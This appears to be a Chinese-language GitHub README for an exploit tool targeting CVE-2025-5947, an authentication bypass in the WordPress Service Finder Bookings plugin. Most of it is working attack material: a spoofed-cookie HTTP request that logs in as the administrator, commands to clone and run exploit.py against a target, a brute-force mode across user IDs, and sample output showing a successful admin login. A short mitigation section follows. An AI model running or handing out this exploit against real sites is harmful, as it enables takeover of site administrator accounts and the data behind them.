CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 漏洞利用工具
WordPress Service Finder Bookings ≤ 6.0 插件中身份验证绕过漏洞的利用工具
Service Finder Bookings WordPress 插件 6.0 及更早版本中存在一个严重的身份验证绕过漏洞。
未经过身份验证的攻击者可以:
service_finder_switch_back() 函数中存在 cookie 验证不足 的问题:
// 不安全的代码
if(isset($_COOKIE['original_user_id'])) {
$user_id = $_COOKIE['original_user_id'];
wp_set_current_user($user_id);
// 没有验证!
}
GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
Host: target.com
Cookie: original_user_id=1
攻击特征:
git clone https://github.com/xxconi/CVE-2025-5947.git
cd CVE-2025-5947
pip install -r requirements.txt
python exploit.py -u http://target.com
# 显示帮助
python exploit.py -h
# 尝试以管理员 (ID=1) 身份登录
python exploit.py -u http://target.com
# 使用指定用户 ID
python exploit.py -u http://target.com -i 5
# 暴力破解 (ID 1-10)
python exploit.py -u http://target.com -b 1-10
# 不进行 SSL 验证
python exploit.py -u http://target.com --no-ssl-verify
# 使用自定义超时时间
python exploit.py -u http://target.com -t 30
python exploit.py -u http://wordpress.local
输出:
============================================================
CVE-2025-5947 Service Finder Bookings Exploit
Authentication Bypass via Cookie Spoofing
============================================================
✅ 已发现 Service Finder Bookings 插件
🔍 正在尝试以用户 ID 1 登录...
📊 HTTP 状态码: 302
📋 响应头:
Location: http://wordpress.local/wp-admin/
Set-Cookie: wordpress_logged_in_abc123=...
✅ 成功!已以管理员身份登录!
📍 重定向: http://wordpress.local/wp-admin/
python exploit.py -u http://target.com -b 1-20
输出:
🔄 暴力破解开始 (20 个用户)...
✅ 用户 ID 1: 成功
❌ 用户 ID 2: 失败
✅ 用户 ID 3: 成功
...
✅ 成功用户: [1, 3, 5]
python exploit.py -u https://target.com --no-ssl-verify
成功利用包含以下迹象:
✅ HTTP 301 或 302 响应状态码
✅ Location 头中包含 /wp-admin/
✅ Set-Cookie 头中包含 wordpress_logged_in_
此工具仅可用于:
请遵守上述要求。作者不承担任何责任。
立即更新
# 从 WordPress 管理面板更新
# 或使用 WP-CLI
wp plugin update sf-booking
禁用插件
wp plugin deactivate sf-booking
卸载插件
wp plugin delete sf-booking
Web 应用防火墙 (WAF)
Block: /wp-admin/admin-ajax.php?action=service_finder_switch_back
安全审计
如需报告问题或提出改进建议:
git checkout -b feature/improvement)git commit -am 'Add improvement')git push origin feature/improvement)MIT License - 详情请查看 LICENSE 文件
安全研究员
⭐ 如果对你有帮助,请点个 Star!
| 属性 | 值 |
|---|
| CVE ID | CVE-2025-5947 |
| 插件 | Service Finder Bookings (sf-booking) |
| 受影响版本 | ≤ 6.0 |
| 严重性 | 🔴 严重 |
| CVSS 评分 | 9.8 |
| CWE | CWE-639 (授权绕过) |
| EPSS 评分 | 0.617 (98.357 百分位) |
| 发布日期 | 2025 |
| 参数 | 缩写 | 说明 | 默认值 |
|---|
--url | -u | 目标 URL (必填) | - |
--user-id | -i | 用户 ID | 1 |
--brute-force | -b | 暴力破解范围 (1-10) | - |
--no-ssl-verify | - | 禁用 SSL 验证 | False |
--timeout | -t | 请求超时时间(秒) | 10 |